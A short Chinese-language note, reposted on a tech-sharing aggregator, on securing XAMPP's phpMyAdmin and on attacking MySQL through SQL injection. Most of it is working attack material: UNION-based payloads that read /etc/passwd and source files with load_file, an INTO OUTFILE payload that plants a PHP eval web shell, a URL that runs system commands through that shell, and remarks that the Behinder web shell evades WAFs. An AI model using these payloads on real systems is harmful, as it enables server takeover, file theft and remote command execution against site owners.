标签：opt 读写 lampp 查询 漏洞 muma file SQL php

一.不要开启phpmyadmin

1.配置文件 /opt/lampp/etc/extra/httpd-xampp.conf

 2.修改phpmyadmin目录名称为不容易猜测的

二.SQL注入-文件读写以及木马植入

1.读写权限确认

 secure_file_priv = 空的时候，任意读写

 secure_file_priv = 某个路径的时候，只能在那个路径下读写

 secure_file_priv = NULL，不能读写

 #利用SQL语句读取系统文件

 -1 union select 1,2,3,load_file("/etc/passwd"),5

 select load_file("/opt/lampp/htdocs/security/common.php") 

 #利用SQL语句写入系统文件
 
 select "hello world" into outfile "/opt/lampp/htdocs/security/muma.php"
 
 -1 union select 1,2,3,"<?php @eval($_GET['a']);?>",5 
 into outfile "/opt/lampp/htdocs/security/muma.php"

 #访问muma.php执行指令
 muma.php?a=system("ifconfig");

三.中国菜刀

1.提前上传了木马

2.请求必须为POST类型，参数自定义

3.传输过程为明文传输，目前已经被WAF给拦截了

四.Behinder冰蝎

1.冰蝎是加密传输，防火墙很难分析出流量特征，比较容易绕开WAF

需要先上传一个冰蝎自己带加密解密功能的web shell

a=system("echo "<?php" >> /opt/lampp/htdocs/security/muma.php");

标签：opt,读写,lampp,查询,漏洞,muma,file,SQL,php
来源： https://www.cnblogs.com/eveplw/p/16536076.html

本站声明： 1. iCode9 技术分享网（下文简称本站）提供的所有内容，仅供技术学习、探讨和分享；
2. 关于本站的所有留言、评论、转载及引用，纯属内容发起人的个人观点，与本站观点和立场无关；
3. 关于本站的所有言论和文字，纯属内容发起人的个人观点，与本站观点和立场无关；
4. 本站文章均是网友提供，不完全保证技术分享内容的完整性、准确性、时效性、风险性和版权归属；如您发现该文章侵犯了您的权益，可联系我们第一时间进行删除；
5. 本站为非盈利性的个人网站，所有内容不会用来进行牟利，也不会利用任何形式的广告来间接获益，纯粹是为了广大技术爱好者提供技术内容和技术思想的分享性交流网站。